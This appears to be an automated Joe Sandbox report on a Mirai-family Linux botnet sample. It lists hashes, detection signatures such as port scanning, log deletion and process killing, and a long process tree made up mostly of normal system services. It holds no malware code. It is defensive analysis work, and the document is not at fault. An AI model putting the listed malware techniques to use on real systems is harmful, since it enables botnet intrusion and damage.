Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
Fantazy.i486.elf

Overview

General Information

Sample name:Fantazy.i486.elf
Analysis ID:1613278
MD5:c75dc6f52d9c7bfc6d217dab9453718b
SHA1:e9b27b4db5833c4884284176c20b599a0d266d98
SHA256:008dbe2d64a5e29f6672c2df24dffaecbc98145cb2352127164b75972e579f61
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Deletes log files
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "kill" or "pkill" command typically used to terminate processes
HTTP GET or POST without a user agent
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Reads system version information
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1613278
Start date and time:2025-02-12 16:56:16 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 5s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:Fantazy.i486.elf
Detection:MAL
Classification:mal100.spre.troj.linELF@0/156@13/0
  • Connection to analysis system has been lost, crash info: Unknown
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Command:/tmp/Fantazy.i486.elf
PID:6216
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
VegaSec-KATANA001
Standard Error:
  • system is lnxubuntu20
  • systemd New Fork (PID: 6226, Parent: 1)
  • journalctl (PID: 6226, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 6240, Parent: 1)
  • systemd-journald (PID: 6240, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6246, Parent: 1)
  • journalctl (PID: 6246, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 6305, Parent: 1)
  • dbus-daemon (PID: 6305, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6306, Parent: 1860)
  • pulseaudio (PID: 6306, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 6312, Parent: 1)
  • rsyslogd (PID: 6312, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6313, Parent: 1)
  • systemd-logind (PID: 6313, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6373, Parent: 1)
  • rtkit-daemon (PID: 6373, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 6380, Parent: 1)
  • polkitd (PID: 6380, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 6385, Parent: 1)
  • agetty (PID: 6385, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • gdm3 New Fork (PID: 6386, Parent: 1320)
  • Default (PID: 6386, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6387, Parent: 1320)
  • Default (PID: 6387, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6388, Parent: 1320)
  • Default (PID: 6388, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6389, Parent: 1)
  • gpu-manager (PID: 6389, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 6390, Parent: 6389, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6391, Parent: 6390)
      • grep (PID: 6391, Parent: 6390, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6392, Parent: 6389, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6393, Parent: 6392)
      • grep (PID: 6393, Parent: 6392, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6394, Parent: 6389, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6395, Parent: 6394)
      • grep (PID: 6395, Parent: 6394, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6396, Parent: 6389, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6397, Parent: 6396)
      • grep (PID: 6397, Parent: 6396, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6398, Parent: 6389, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6399, Parent: 6398)
      • grep (PID: 6399, Parent: 6398, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6400, Parent: 6389, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6401, Parent: 6400)
      • grep (PID: 6401, Parent: 6400, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6405, Parent: 6389, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6406, Parent: 6405)
      • grep (PID: 6406, Parent: 6405, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6407, Parent: 6389, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6408, Parent: 6407)
      • grep (PID: 6408, Parent: 6407, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 6410, Parent: 1)
  • generate-config (PID: 6410, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 6411, Parent: 6410, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 6413, Parent: 1)
  • gdm-wait-for-drm (PID: 6413, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • fusermount (PID: 6418, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 6423, Parent: 1)
  • gdm3 (PID: 6423, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 6426, Parent: 6423)
    • plymouth (PID: 6426, Parent: 6423, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 6447, Parent: 6423)
    • gdm-session-worker (PID: 6447, Parent: 6423, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
      • gdm-wayland-session (PID: 6451, Parent: 6447, MD5: d3def63cf1e83f7fb8a0f13b1744ff7c) Arguments: /usr/lib/gdm3/gdm-wayland-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
        • dbus-daemon (PID: 6453, Parent: 6451, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 3 --session
          • dbus-daemon New Fork (PID: 6455, Parent: 6453)
            • false (PID: 6456, Parent: 6455, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
        • dbus-run-session (PID: 6457, Parent: 6451, MD5: 245f3ef6a268850b33b0225a8753b7f4) Arguments: dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart
          • dbus-daemon (PID: 6458, Parent: 6457, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --nofork --print-address 4 --session
    • gdm3 New Fork (PID: 6459, Parent: 6423)
    • Default (PID: 6459, Parent: 6423, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 6460, Parent: 6423)
    • Default (PID: 6460, Parent: 6423, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6428, Parent: 1)
  • accounts-daemon (PID: 6428, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6442, Parent: 6428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6443, Parent: 6442, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6444, Parent: 6443, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6445, Parent: 6444)
          • locale (PID: 6445, Parent: 6444, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6446, Parent: 6444)
          • grep (PID: 6446, Parent: 6444, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6480, Parent: 1)
  • journalctl (PID: 6480, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 6481, Parent: 1)
  • systemd-journald (PID: 6481, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6482, Parent: 1)
  • journalctl (PID: 6482, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 6498, Parent: 1)
  • dbus-daemon (PID: 6498, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6504, Parent: 1)
  • systemd-logind (PID: 6504, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6562, Parent: 1)
  • gpu-manager (PID: 6562, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 6563, Parent: 6562, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6564, Parent: 6563)
      • grep (PID: 6564, Parent: 6563, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6565, Parent: 6562, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6566, Parent: 6565)
      • grep (PID: 6566, Parent: 6565, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6567, Parent: 6562, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6568, Parent: 6567)
      • grep (PID: 6568, Parent: 6567, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6569, Parent: 6562, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6570, Parent: 6569)
      • grep (PID: 6570, Parent: 6569, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6571, Parent: 6562, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6572, Parent: 6571)
      • grep (PID: 6572, Parent: 6571, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6573, Parent: 6562, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6574, Parent: 6573)
      • grep (PID: 6574, Parent: 6573, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6575, Parent: 6562, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6576, Parent: 6575)
      • grep (PID: 6576, Parent: 6575, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6577, Parent: 6562, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6578, Parent: 6577)
      • grep (PID: 6578, Parent: 6577, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 6579, Parent: 1)
  • generate-config (PID: 6579, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 6580, Parent: 6579, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 6583, Parent: 1)
  • gdm-wait-for-drm (PID: 6583, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 6584, Parent: 1)
  • rsyslogd (PID: 6584, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6588, Parent: 1)
  • agetty (PID: 6588, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 6589, Parent: 1)
  • journalctl (PID: 6589, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 6590, Parent: 1)
  • systemd-journald (PID: 6590, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6598, Parent: 1)
  • dbus-daemon (PID: 6598, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6599, Parent: 1)
  • journalctl (PID: 6599, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 6603, Parent: 1)
  • systemd-logind (PID: 6603, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6662, Parent: 1)
  • gdm3 (PID: 6662, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 6665, Parent: 6662)
    • plymouth (PID: 6665, Parent: 6662, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 6682, Parent: 6662)
    • gdm-session-worker (PID: 6682, Parent: 6662, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm3 New Fork (PID: 6693, Parent: 6662)
    • Default (PID: 6693, Parent: 6662, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 6694, Parent: 6662)
    • Default (PID: 6694, Parent: 6662, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6666, Parent: 1)
  • accounts-daemon (PID: 6666, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6670, Parent: 6666, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6671, Parent: 6670, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6672, Parent: 6671, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6673, Parent: 6672)
          • locale (PID: 6673, Parent: 6672, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6674, Parent: 6672)
          • grep (PID: 6674, Parent: 6672, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6675, Parent: 1)
  • polkitd (PID: 6675, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 6681, Parent: 1)
  • rsyslogd (PID: 6681, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6687, Parent: 1)
  • agetty (PID: 6687, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 6689, Parent: 1)
  • journalctl (PID: 6689, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 6690, Parent: 1)
  • systemd-journald (PID: 6690, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6696, Parent: 1)
  • dbus-daemon (PID: 6696, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6701, Parent: 1)
  • systemd-logind (PID: 6701, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6759, Parent: 1860)
  • dbus-daemon (PID: 6759, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6760, Parent: 1860)
  • pulseaudio (PID: 6760, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 6761, Parent: 1)
  • gpu-manager (PID: 6761, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 6762, Parent: 6761, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6763, Parent: 6762)
